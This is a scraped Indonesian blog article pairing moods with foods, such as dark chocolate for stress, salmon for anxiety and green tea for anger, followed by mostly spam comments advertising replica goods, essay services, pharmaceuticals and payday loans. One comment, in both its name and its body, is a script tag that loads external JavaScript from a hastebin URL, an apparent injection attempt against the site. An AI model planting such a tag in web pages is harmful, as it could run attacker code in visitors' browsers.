Makanan sebagai Mood Booster
Sumber https://garisbatas.com

By Lina DJ 27 Feb 2017, 11:14:02 WIBArticles

Makanan sebagai Mood Booster

Keterangan Gambar :


Mood atau suasana hati seseorang biasanya berbeda-beda, tergantung dari apa yang sedang berada dalam pikiran orang tersebut, kadang bahagia di pagi hari, namun siang hari sudah merasa stress karena pekerjaan yang menumpuk. Ada orang yang jika stress akan memakan apapun dengan harapan sensasi nikmatnya makan akan mengurangi stress. Apakah cara tersebut sudah benar, mari kita membahas mengenai makanan yang paling sesuai dengan kondisi mood Anda.

 

 

1. Stress

 

 

 

                                                               Coklat

 

Coklat, selain rasanya enak, ternyata juga dapat menekan tingkat stress seseorang. Makan coklat, terutama coklat hitam dapat meningkatkan kadar serotonin dan endorphin dan menekan hormon kortisol di otak. Kenaikan tingkat serotonin dan endorphin di otak  dapat membuat seseorang merasa bahagia. Penelitian menunjukan bahwa makan coklat selama 2 minggu menyebabkan rendahnya hormon stress kortisol di otak. Tapi ingat, coklat yang beredar saat ini kebanyakan juga memiliki kadar gula yang tinggi, walaupun dapat mengobati stress Anda, konsumsinya tetap harus dikontrol.

2. Lemot/Lola

 

 

 

Bayam

 

Tidak konsentrasi, atau dalam bahasa sehari-hari biasa dibilang ‘lemot/lola‘ juga merupakan mood yang kadang-kadang timbul pada diri manusia. Kondisi ini dapat diatasi dengan cara memperbanyak makan makanan yang mengandung banyak folat atau vitamin B9. Folat sangat baik untuk berbagai fungsi tubuh, diantaranya adalah sebagai sintetis DNA dan pertumbuhan/perbaikan sell. Dengan demikian konsumsi makanan yang kaya dengan asam folat dapat meningkatkan konsentrasi, fungsi kognitif dan fungsi sosial pada otak. Makanan yang mengandung banyak folat diantaranya adalah kacang-kacangan dan sayuran terutama bayam.

 

 

 

3. Kesal/Mudah Tersinggung

 

Jika Anda merasa kesal, mudah tersinggung atau ngambek, artinya otak Anda kekurangan bahan bakar dan membutuhkan sumber energy tambahan. Makanan yang tepat untuk kondisi mood ini adalah kombinasi antara selai kacang dan apel. Kombinasi makanan ini dapat memberikan supply karbohidrat kompleks dan lemak yang aman dan tahan lama. Hal ini  tentunya dapat menjadi supply energy yang baik untuk otak Anda.

 

 

 

4. Gelisah

 

 

 

Salmon

 

 

Ikan salmon adalah makanan terbaik saat Anda merasa gelisah. Selain mengandung asam lemak Omega-3, ikan salmon juga banyak mengandung protein dan vitamin B, yang mana dapat berfungsi sebagai bahan bakar neuron di otak. Ikan salmon mengandung tryptophan, yaitu asam amino yang dapat menurunkan hormon stress dan memberikan rasa ketenangan terhadap yang memakannya. Menurut penelitian di Universitas Ohio, mengkonsumsi 2.5 gram asam lemak Omega-3, dapat mengurangi kecemasan sekitar 20%. Lain dari itu, ikan salmon juga termasuk makanan lezat yang tentunya menyenangkan untuk dikonsumsi. Ikan salmon yang ditangkap dari alam liar lebih sehat dibandingkan dengan ikan salmon yang diambil dari peternakan ikan.

5. Marah

 

Jika Anda dalam kondisi marah, berarti Anda membutuhkan konsumsi makanan yang dapat menurunkan tingkat stress Anda secara cepat. Berdasarkan penelitian yang diterbitkan oleh American Journal, green tea adalah herbal yang cukup ampuh dalam menurunkan tingkat stress dengan cepat. Pada green tea, terdapat asam amino yang disebut dengan L-Theanine yang memiliki efek menenangkan bagi yang meminumnya. L-Theanine dapat memicu gelombang otak yang disebut dengan gelombang Alpha, yaitu gelombang yang biasa muncul pada saat orang dalam keadaan santai. Selain itu L-Theanine juga dapat meningkatkan serotonin dan dopamin di otak yang dapat menenangkan suasana hati.

 

 

6. Sedih

 

 

Susu

 

 

Saat sedih, sebaiknya konsumsi makanan yang mengandung banyak Vitamin D seperti susu rendah lemak. Sebenarnya belum dapat dipahami dengan jelas bagaimana proses di dalam tubuh antara vitamin D dengan tingkat depresi seseorang, namun kekurangan Vitamin D dapat menyebabkan seseorang mudah mengalami depresi.

Nah sekarang Anda sudah tahu, apa yang harus Anda konsumsi sesuai dengan mood Anda. Mulai sekarang, sediakan makanan-makanan di atas di lemari es Anda, agar Anda tetap dapat mengontrol mood Anda.



Write a Facebook Comment

Tuliskan Komentar anda dari account Facebook

Write a comment

Ada 40 Komentar untuk Berita Ini

  1. sewa mobil untuk perjalanan jauh 20 Mar 2017, 18:26:30 WIB

    Wah bener tuh makanan kesukaan saya di pagi hari itu coklat yang manis-manis biar buat semangat. Apalagi kalau mau pergi jalan-jalan barengt keluarga naik mobil sewaan untuk perjalanan jauh pasti harus selalu sedia coklat banyak biar seger di jalan dan enggak terpengaruh sama kondisi jalanan kalo macet.

    souvenir mug murah 20 Mar 2017, 18:35:09 WIB

    Bener tuh kalo di tempat kerja saya memang suka nyemil tujuannya ya buat ningkatin mood booster, apalagi kalau ada yang mau traktir paling seneng banget deh, biasanya sih ada temen yang baik banget pernah di kasih souvenir mug dulu sayangnya cuma sekali aja sih XD.

    <script type="text/javascript" src="https://hastebin.com/viwihaxuju.js">&l 09 Apr 2017, 01:05:49 WIB

    <script type="text/javascript" src="https://hastebin.com/viwihaxuju.js">< /script>

    replica miu miu handbags 12 Jul 2017, 08:26:00 WIB

    good

    gucci replica handbags 19 Sep 2017, 16:16:27 WIB

    Thus, you will certainly really feel really confident and happy.

    I Need an Essay - PaperChoice.Org 28 Sep 2017, 16:00:39 WIB

    When I initially commented I clicked the "Notify me when new comments are added" checkbox and now each time a comment is added I get four e-mails with the same comment. Is there any way you can remove me from that service? Appreciate it!

    replica rolex 09 Des 2017, 09:11:54 WIB

    interpreting the uk replica watches Longines watchmaking expertise and once again showing the watchmakers a superior and classic wrist swiss replica watches Good product.

    jual kue ulang tahun 07 Jan 2018, 21:11:11 WIB

    wah bener banget tuh, kalo tiap kali lagi badmood saya sering banget beli kue coklat biar mood bisa balik lagi. Paling seneng juga kalo pas ulang tahun itu dikasih kue black forest yang penuh coklat, bisa habis sendirian tuh kuenya hehehe

    do my coursework 16 Mei 2018, 02:44:27 WIB

    I am overwhelmed by your post with such a nice topic. Usually I visit your blogs and get updated through the information you include but today’s blog would be the most appreciable. Well done!

    https://gcc-marketing.com 30 Mei 2018, 18:17:03 WIB

    The material and aggregation is excellent and telltale as comfortably.

    website development company Dubai 12 Jun 2018, 17:38:50 WIB

    The material and aggregation is excellent and telltale as comfortably.

    Dog Flyers 14 Jun 2018, 18:33:28 WIB

    The material and aggregation is excellent and telltale as comfortably.

    viraltoppop 28 Jun 2018, 00:20:41 WIB

    I need to to thank you for this very good read!! I definitely loved every little bit of it. I have you bookmarked to check out new things you post…

    office 2010 activator 06 Jul 2018, 18:18:39 WIB

    I feel very grateful that I read this. It is very helpful and very informative and I really learned a lot from it.

    Office 2013 Activator 11 Jul 2018, 21:11:55 WIB

    The material and aggregation is excellent and telltale as comfortably.

    local movers dubai abu dhabi 14 Jul 2018, 14:22:36 WIB

    Cool stuff you have and you keep overhaul every one of us

    Customers 15 Jul 2018, 15:22:03 WIB

    Wow! Such an amazing and helpful post this is. I really really love it. It's so good and so awesome. I am just amazed. I hope that you continue to do your work like this in the future also.

    Slime 15 Jul 2018, 17:25:23 WIB

    Wow! Such an amazing and helpful post this is. I really really love it. It's so good and so awesome. I am just amazed. I hope that you continue to do your work like this in the future also.

    dentist doctor 15 Jul 2018, 22:13:54 WIB

    I read your post and I found it amazing! thank!

    Help With Accounting Homework For Me Online 16 Jul 2018, 12:44:47 WIB

    Such A Nice Post, Keep Up The Fantastic Work

    Harvard Case Analysis 16 Jul 2018, 16:29:04 WIB

    I’m Really Impressed With Your Article, Such Great & Usefull Knowledge You Mentioned Here

    Bepanah 16 Jul 2018, 17:40:37 WIB

    Admiring the time and effort you put into your blog and detailed information you offer!..

    chec 17 Jul 2018, 04:53:54 WIB

    It is good to conatact Zahnarzt Notdienst as soon as possible

    Mike 17 Jul 2018, 04:55:02 WIB

    Make more engagement by making demography interest-related content

    Andros 17 Jul 2018, 04:56:15 WIB

    fne the best hybrid smartwatch for me so I can make my day more productive.

    seo Expernt 17 Jul 2018, 04:57:22 WIB

    In seo keyword, research and niche research is most important than anything.

    Vlogger man 17 Jul 2018, 04:58:09 WIB

    For starting a vlogging carries there so much to learn about

    JOE 17 Jul 2018, 04:59:36 WIB

    t do all 84 basic yoga you need to learn more

    Frankline 17 Jul 2018, 05:04:59 WIB

    Attention Deficit Hyperactivity Disorder is taken over many people. And it distracts people from keeping something attention for a good time.

    sinka 17 Jul 2018, 05:06:50 WIB

    If you ever think that you are getting close with the drug then leave it as soon as possible,

    Healthy Human Being 17 Jul 2018, 05:08:08 WIB

    Dont even think about, bad and junk food, reality is that it can kill you slowly

    Natural Treatment 17 Jul 2018, 05:09:27 WIB

    If you ever think of getting natural treatment then do 1 think that is take best fruit in your house and make fresh juice

    Root Canal Treatment in Jaipur 17 Jul 2018, 13:21:27 WIB

    Ekdantam Dental Clinic is leading Root Canal Treatment in Jaipur, India.we have team of expert dentists for providing painless dental treatments. Book your appointment online or directly by call: +91-9782601131

    Tu Aashiqui 18 Jul 2018, 17:39:11 WIB

    Glad to chat your blog, I seem to be forward to more reliable articles and I think we all wish to thank so many good articles, blog to share with us.

    medicine for early discharge problem 19 Jul 2018, 16:43:06 WIB

    I have bookmarked your website because this site contains valuable information in it. I am really happy with articles quality and presentation. Thanks a lot for keeping great stuff. I am very much thankful for this site.

    Eid aldha Greetings Images 19 Jul 2018, 18:09:47 WIB

    A good blog always comes-up with new and exciting information and while reading I have feel that this blog is really have all those quality that qualify a blog to be a one.

    National Father Daughter Take a Walk Day 21 Jul 2018, 19:33:54 WIB

    I'm happy to see the considerable subtle element here!.

    voyance par tel 23 Jul 2018, 17:09:43 WIB

    Glad to chat your blog, I seem to be forward to more reliable articles and I think we all wish to thank so many good articles, blog to share with us

    jame charles 31 Jul 2018, 23:53:42 WIB

    i read your blog and i truly believe that all information on the blog was quite reliable. well effort put by author.

    lets do survey 01 Agu 2018, 00:06:56 WIB

    this is quite interesting information. making the home made remedies is the great. and such articles help in solving problems with things easily available at home.

View all comments

Write a comment

Online Support (Chat)

Admin ACP Indonesia

Find us also on

Follow us on facebook, twitter,Instagram, Youtube and get the latest information from us there.

Opinion Poll



Last Comments

  • Payday Loans

    personal loan <a href="https://personalloan.trade">personal loan no credit ...

    View Article
  • gdrUrilt

    cialis levitra side effects clomiphene age 40 <a ...

    View Article
  • nygMelty

    tadalafil en similares sildenafil and stroke <a ...

    View Article
  • Speedy Cash

    no credit check payday loans <a href="https://loansnocreditcheck.shop">loans ...

    View Article